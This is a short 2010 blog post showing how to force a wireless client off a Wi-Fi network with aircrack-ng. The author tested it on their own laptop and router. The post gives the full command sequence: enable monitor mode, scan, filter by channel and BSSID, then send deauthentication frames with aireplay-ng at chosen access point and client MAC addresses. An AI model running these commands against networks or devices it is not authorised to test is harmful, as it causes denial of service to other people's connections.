Thursday, May 27, 2010

Forcefully disconnect a wireless client

Is it possible to disconnect a wireless client connected to a highly encrypted wireless network? Uhh, apparently yes. I been messing around with the aircrack-ng suite of tools (again) recently and decided to dive deeper into its capabilities. In a past blog, i wrote briefly about aircrack-ng and cracking WEP keys. I didn't speak in depth about its features then but would like to add just a little bit more. This time i'll be showing some commands that i've used to disconnect one of my wireless laptops, using a netbook that wasn't even autheneticated or connected to my wireless router. What this means is that any user can do a drive by in his automobile and forcefully cause me to disconnect from my wireless router, and cause a denial of service. This denial of service is for a brief period in time as the wireless clients may automatically try to reconnect to their wireless systems.

First turn your wireless card into monitor mode:
# airmon-ng start wlan0

Then scan the air for wireless AP's and clients
# airodump-ng mon0

When you found a an access point that has a client connected, you can filter your scan. This also sets the interface to operate on that particular channel for injecting packets:
# airodump-ng --channel 9 -b aa:aa:aa:aa:aa:aa mon0

And finally, the injection of death frames
#aireplay-ng -a aa:aa:aa:aa:aa:aa -c bb:bb:bb:bb:bb:bb --deauth 1 mon0

'-a' represents the MAC address of the target access point
'-c' represents the MAC address of the target host

No comments:

Post a Comment